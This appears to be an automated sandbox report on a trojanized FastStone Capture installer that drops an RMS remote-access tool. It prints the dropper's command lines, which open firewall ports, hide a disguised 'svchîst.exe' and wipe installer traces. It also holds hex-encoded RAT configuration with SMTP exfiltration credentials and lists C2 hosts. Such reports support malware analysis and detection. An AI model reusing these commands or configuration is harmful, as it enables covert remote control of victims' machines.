PID 2756 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4780 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 4120 wrote to memory of 832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 4120 wrote to memory of 832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 4120 wrote to memory of 832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\drivers\install.exe
PID 5092 wrote to memory of 3588 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\FastStone Capture\FSCapture.exe
PID 5092 wrote to memory of 3588 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\FastStone Capture\FSCapture.exe
PID 5092 wrote to memory of 3588 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files (x86)\FastStone Capture\FSCapture.exe
PID 1240 wrote to memory of 3924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1240 wrote to memory of 3924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1240 wrote to memory of 3924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 2756 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1152 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 1860 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe C:\Windows\SysWOW64\cmd.exe
PID 832 wrote to memory of 4472 N/A C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\cmd.exe

Views/modifies file attributes

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe

"C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c if exist "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg" (goto& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit) else taskkill /f /im rutserv.exe& taskkill /f /im rfusclient.exe& reg delete "HKLM\SYSTEM\Remote Manipulator System" /f& netsh firewall add portopening TCP 5650 "Open Port 5650"& netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650& "%SYSTEMROOT%\System32\drivers\install.exe"& ping 127.0.0.1& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /silentinstall&"%SYSTEMROOT%\System32\drivers\svchîst.exe" /firewall& "%SYSTEMROOT%\System32\drivers\svchîst.exe" /start& Echo Windows Registry Editor Version 5.00> %SYSTEMROOT%\System32\idfgvgjnghcdfb.reg& attrib +h +s "%SYSTEMROOT%\System32\idfgvgjnghcdfb.reg"& cd %SYSTEMROOT%\System32\drivers& attrib +h +s "svchîst.exe"& attrib -h -s "install.exe"& del /f /q "install.exe"& attrib -h -s "install.cmd"& del /f /q "install.cmd"& Exit

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f& REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f& Exit

C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe

"C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe" /S /IR

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rutserv.exe

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service\Parameters\AppExit" /t REG_SZ /d "Restart" /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\DNS-Service" /v FailureActions /t REG_BINARY /d 0000000000000000000000000300000057005300010000000000000001000000000000000100000000000000 /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im rfusclient.exe

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SYSTEM\Remote Manipulator System" /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add portopening TCP 5650 "Open Port 5650"

C:\Windows\SysWOW64\netsh.exe

netsh.exe advfirewall firewall delete rule name="all" remoteip=95.141.193.133

C:\Windows\SysWOW64\route.exe

route.exe delete 95.141.193.133

C:\Windows\SysWOW64\netsh.exe

netsh advfirewall firewall add rule name="Open Port 5650" dir=in action=allow protocol=TCP localport=5650

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\FastStone Capture\FSCapture.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Program Files\FastStone Capture\FSCapture.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\*.*"

C:\Windows\SysWOW64\drivers\install.exe

"C:\Windows\System32\drivers\install.exe"

C:\Program Files (x86)\FastStone Capture\FSCapture.exe

"C:\Program Files (x86)\FastStone Capture\FSCapture.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\*.*"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c RMDIR /s/q "C:\Users\Admin\AppData\Local\Temp\FastStone Capture"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FastStone Capture 9.4" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 19.0.9700.2132" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f
6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d 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 /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d 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 /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\FastStone Capture 9.4" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d 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 /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 19.0.9700.2132" /f

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c74657
25f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e6
16765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d 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 /f

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /silentinstall

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /firewall

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /start

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\SysWOW64\drivers\svchîst.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "C:\Windows\System32\idfgvgjnghcdfb.reg"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "svchîst.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s "install.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s "install.cmd"

C:\Windows\SysWOW64\drivers\svchîst.exe

C:\Windows\SysWOW64\drivers\svchîst.exe -firewall

Network

Country Destination Domain Proto
US 20.42.72.131:443 tcp
NL 104.110.191.140:80 tcp
US 93.184.221.240:80 tcp
US 204.79.197.203:80 tcp
US 13.107.21.200:443 tcp
US 8.8.8.8:53 smtp.spaceweb.ru udp
RU 77.222.41.129:25 smtp.spaceweb.ru tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
RU 109.234.156.179:5655 tcp

Files

memory/4120-130-0x0000000000000000-mapping.dmp

memory/4916-131-0x0000000000000000-mapping.dmp

memory/4220-133-0x0000000000000000-mapping.dmp

memory/3088-132-0x0000000000000000-mapping.dmp

memory/2588-134-0x0000000000000000-mapping.dmp

memory/2292-135-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\FastStone Capture\9.4\setup.exe

MD5 d11ab72ad73808bea3acf250e78c1d50
SHA1 b22161c8eba04d21c9d9bcb77ceba14e4a7b74b7
SHA256 b7bbc834fe7217105cc2064026235abff19d502f1a88a4b0ee7a4d345fa23f9b
SHA512 fc153f01a4083abe1ddbf8b80b2164f1ae14200d5d2e1d33030420ee477cfa7e7cba34870226d6e27f60d5e130ff39908d38984fba28dde5324b68fefcf7bb31

memory/4672-138-0x0000000000000000-mapping.dmp

memory/5040-139-0x0000000000000000-mapping.dmp

memory/4344-140-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\nsExec.dll

MD5 f27689c513e7d12c7c974d5f8ef710d6
SHA1 e305f2a2898d765a64c82c449dfb528665b4a892
SHA256 1f18f4126124b0551f3dbcd0fec7f34026f930ca509f04435657cedc32ae8c47
SHA512 734e9f3989ee47a86bee16838df7a09353c7fe085a09d77e70d281b21c5477b0b061616e72e8ac8fcb3dda1df0d5152f54dcc4c5a77f90fbf0f857557bf02fbc

memory/5004-142-0x0000000000000000-mapping.dmp

memory/624-144-0x0000000000000000-mapping.dmp

memory/1304-145-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

C:\Users\Admin\AppData\Local\Temp\nsz1F61.tmp\nsProcess.dll

MD5 f0438a894f3a7e01a4aae8d1b5dd0289
SHA1 b058e3fcfb7b550041da16bf10d8837024c38bf6
SHA256 30c6c3dd3cc7fcea6e6081ce821adc7b2888542dae30bf00e881c0a105eb4d11
SHA512 f91fcea19cbddf8086affcb63fe599dc2b36351fc81ac144f58a80a524043ddeaa3943f36c86ebae45dd82e8faf622ea7b7c9b776e74c54b93df2963cfe66cc7

memory/5092-158-0x0000000000000000-mapping.dmp

memory/4780-159-0x0000000000000000-mapping.dmp

memory/1240-160-0x0000000000000000-mapping.dmp

memory/832-161-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

memory/3588-164-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\FastStone Capture\FSCapture.exe

MD5 1eceb7f17d041444ea91fcb5a3272c3e
SHA1 33e3ac0adbdd4490f333ee2a844027a4a7d8b19f
SHA256 d6640edb56e4052c3f2de0f396c7b71fe0b478419ae54de7bfcfb72198bf8929
SHA512 6e5d0f98967ef9cbc9abd349304667573840f61dc4cc4281313268198836043fc7555a902baeee34d9dfe767ec252e3c7687c3beb2065a2b396f19cade32ec2d

C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

MD5 8708699d2c73bed30a0a08d80f96d6d7
SHA1 684cb9d317146553e8c5269c8afb1539565f4f78
SHA256 a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f
SHA512 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

C:\Program Files (x86)\FastStone Capture\FSCapture.ENU

MD5 a34680a3a79746aa2851f53ee970fed9
SHA1 88b31d3753012e3c8ed3806aa9fb45bb39091584
SHA256 9942d2e76602e3c3ffd2f2a6a124d2f768a361e46ba28f407604e77742ebc9dd
SHA512 cd0334613f0044aae24fb76812752e2e5c94a330d689230adedd2b625db4abedc57a8d216720b7c21784926df7e88cb891883671318f6001951946f418196ea7

memory/3924-169-0x0000000000000000-mapping.dmp

memory/1152-170-0x0000000000000000-mapping.dmp

memory/1860-171-0x0000000000000000-mapping.dmp

memory/4276-172-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\FastStone\FSC\fsc.db

MD5 a979f58d3ece3f44d6572a44efb4a0cc
SHA1 2ac4dbb1994f4b3ef9c13445734f9c16843b140b
SHA256 9ebc76ead646faf16af6605a7d7a8a5c5a3ccf9b9e2ca6628381a5da2b26a87e
SHA512 9bbe07357c6ec4e7eb66acb4b068e1dccd4d73b7fd88d07a4c664ea4501bf3e581bdfe3a221a187ef242570a8733eef5b5227c14f365b1fd79a4f40a17c1c471

memory/3816-176-0x0000000000000000-mapping.dmp

memory/4472-175-0x0000000000000000-mapping.dmp

memory/1820-178-0x0000000000000000-mapping.dmp

memory/452-177-0x0000000000000000-mapping.dmp

memory/2424-180-0x0000000000000000-mapping.dmp

memory/3904-179-0x0000000000000000-mapping.dmp

memory/2516-181-0x0000000000000000-mapping.dmp

memory/4440-182-0x0000000000000000-mapping.dmp

memory/4348-184-0x0000000000000000-mapping.dmp

memory/388-183-0x0000000000000000-mapping.dmp

memory/5096-185-0x0000000000000000-mapping.dmp

memory/1756-186-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

memory/4584-192-0x0000000000000000-mapping.dmp

memory/1120-196-0x0000000000000000-mapping.dmp

memory/2252-204-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\idfgvgjnghcdfb.reg

MD5 7b5e1d30e89e0ef1c86fecb977131673
SHA1 78df83f3256df2efbe483d182d4cc13afe99be2b
SHA256 b114302cfede0f574362385c4949dde34c544b5213a239908299588f00b0bd80
SHA512 eae8f24f30b8dac2d0944fb702aca9c6ca30a5d3ffb6a4191afec47af1f59a50bbaa00d11b07976f485c58839f1927695655a69ff81807ca123026dd2e84b719

memory/1940-206-0x0000000000000000-mapping.dmp

memory/3768-207-0x0000000000000000-mapping.dmp

memory/3900-208-0x0000000000000000-mapping.dmp

memory/1612-209-0x0000000000000000-mapping.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2022-04-27 17:37

Reported

2022-04-27 19:29

Platform

win7-20220414-en

Max time kernel

150s

Max time network

174s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe"

Signatures

RMS

trojan rat rms

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\drivers\svchîst.exe C:\Users\Admin\AppData\Local\Temp\0b9ee1d8605aac2a861b474a38d4147cbf40cf36b1d87f9c582c1bd2a5c43e94.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\svchîst.exe C:\Windows\SysWOW64\attrib.exe N/A
File opened for modification C:\Windows\SysWOW64\drivers\install.exe C:\Windows\SysWOW64\attrib.exe N/A
